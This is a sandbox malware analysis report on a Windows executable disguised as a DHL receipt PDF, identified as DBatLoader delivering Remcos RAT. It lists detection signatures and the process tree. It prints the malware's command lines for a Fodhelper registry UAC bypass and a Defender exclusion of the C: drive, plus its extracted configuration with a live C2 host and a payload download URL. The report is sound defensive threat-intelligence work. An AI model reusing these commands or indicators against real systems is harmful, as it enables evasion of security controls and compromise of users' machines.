Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL119040 receipt document,pdf.exe

Overview

General Information

Sample name:DHL119040 receipt document,pdf.exe
Analysis ID:1471440
MD5:0db7fbc1b1d0af0a9503401691f95e30
SHA1:e93bb010d9df4bb5df8203429d228d4748976747
SHA256:f2df2225b522198984f1c38654f2d06f2855a0efc8c57d87f566ea21e5c68cab
Tags:exeRATRemcosRAT
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Opens network shares
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL119040 receipt document,pdf.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
    • yfkwifxL.pif (PID: 7476 cmdline: C:\Users\Public\Libraries\yfkwifxL.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • cmd.exe (PID: 7536 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • extrac32.exe (PID: 7616 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7700 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7720 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7744 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7760 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7784 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7804 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7844 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7860 cmdline: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 7884 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • xkn.exe (PID: 7900 cmdline: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 04029E121A0CFA5991749937DD22A1D9)
            • alpha.exe (PID: 8076 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • ger.exe (PID: 8096 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • per.exe (PID: 6904 cmdline: "C:\\Windows \\System32\\per.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • alpha.exe (PID: 7720 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • taskkill.exe (PID: 7760 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • alpha.exe (PID: 6016 cmdline: C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • PING.EXE (PID: 7788 cmdline: ping 127.0.0.1 -n 2 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • alpha.exe (PID: 5852 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 2992 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 8108 cmdline: C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 8088 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7308 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7416 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 7456 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • extrac32.exe (PID: 7520 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • remcos.exe (PID: 7596 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • remcos.exe (PID: 8144 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
      • remcos.exe (PID: 8152 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
      • remcos.exe (PID: 8168 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
  • SystemSettingsAdminFlows.exe (PID: 5316 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • remcos.exe (PID: 8132 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
  • remcos.exe (PID: 3844 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 0DB7FBC1B1D0AF0A9503401691F95E30)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://onedrive.live.com/download?resid=C1498A9AB442E5A6%21120&authkey=!ANtDpuLqmv7Bgp8"]}

Threatname: Remcos

{"Host:Port:Password": "jantasagasa.duckdns.org:44577:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0X3XK5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\trhrth\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
    • 0x14a8:$a1: Remcos restarted by watchdog!
    • 0x1a20:$a3: %02i:%02i:%02i:%03i
    00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4c0:$a1: Remcos restarted by watchdog!
        • 0x6ca38:$a3: %02i:%02i:%02i:%03i
        0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 23 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4a8:$a1: Remcos restarted by watchdog!
              • 0x6ca20:$a3: %02i:%02i:%02i:%03i
              0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6656c:$str_b2: Executing file:
              • 0x675ec:$str_b3: GetDirectListeningPort
              • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67118:$str_b7: \update.vbs
              • 0x66594:$str_b9: Downloaded file:
              • 0x66580:$str_b10: Downloading file:
              • 0x66624:$str_b12: Failed to upload file:
              • 0x675b4:$str_b13: StartForward
              • 0x675d4:$str_b14: StopForward
              • 0x67070:$str_b15: fso.DeleteFile "
              • 0x67004:$str_b16: On Error Resume Next
              • 0x670a0:$str_b17: fso.DeleteFolder "
              • 0x66614:$str_b18: Uploaded file:
              • 0x665d4:$str_b19: Unable to delete:
              • 0x67038:$str_b20: while fso.FileExists("
              • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
              0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6637c:$s1: CoGetObject
              • 0x66390:$s1: CoGetObject
              • 0x663ac:$s1: CoGetObject
              • 0x70338:$s1: CoGetObject
              • 0x6633c:$s2: Elevation:Administrator!new:
              Click to see the 7 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: TrustedPath UAC Bypass Pattern
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\\Windows \\System32\\per.exe" , CommandLine: "C:\\Windows \\System32\\per.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\per.exe, NewProcessName: C:\Windows \System32\per.exe, OriginalFileName: C:\Windows \System32\per.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\\Windows \\System32\\per.exe" , ProcessId: 6904, ProcessName: per.exe
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yfkwifxL.pif, NewProcessName: C:\Users\Public\Libraries\yfkwifxL.pif, OriginalFileName: C:\Users\Public\Libraries\yfkwifxL.pif, ParentCommandLine: "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe", ParentImage: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ParentProcessId: 7380, ParentProcessName: DHL119040 receipt document,pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, ProcessId: 7476, ProcessName: yfkwifxL.pif
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Lxfiwkfy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ProcessId: 7380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lxfiwkfy
              Sigma detected: Parent in Public Folder Suspicious Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7784, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ProcessId: 7804, ProcessName: extrac32.exe
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 7884, ProcessName: alpha.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Lxfiwkfy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ProcessId: 7380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lxfiwkfy
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\yfkwifxL.pif, NewProcessName: C:\Users\Public\Libraries\yfkwifxL.pif, OriginalFileName: C:\Users\Public\Libraries\yfkwifxL.pif, ParentCommandLine: "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe", ParentImage: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ParentProcessId: 7380, ParentProcessName: DHL119040 receipt document,pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\yfkwifxL.pif, ProcessId: 7476, ProcessName: yfkwifxL.pif
              Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 7900, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csfciyc0.c1a.ps1
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 7884, ProcessName: alpha.exe
              Sigma detected: Suspicious Reg Add Open Command
              Source: Process startedAuthor: frack113: Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7536, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 7884, ProcessName: alpha.exe
              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe, ProcessId: 7380, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-0X3XK5

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 84 98 61 E5 04 5A 3A 86 B7 FD 3E F9 FC DA 29 16 E8 5D C6 88 D7 3D E6 50 ED 13 56 23 B8 BF 3A 7F 26 6C BC 71 6A 11 BF 12 58 C1 C9 0E CF 73 65 7C C5 9A B1 64 56 33 33 63 ED 63 BA 78 48 03 DA 61 DC 52 , EventID: 13, EventType: SetValue, Image: C:\ProgramData\Remcos\remcos.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-0X3XK5\exepath

              Snort Signatures

              Timestamp:07/11/24-12:47:11.473328
              SID:2032776
              Source Port:49736
              Destination Port:44577
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/11/24-12:49:23.758131
              SID:2032777
              Source Port:44577
              Destination Port:49736
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
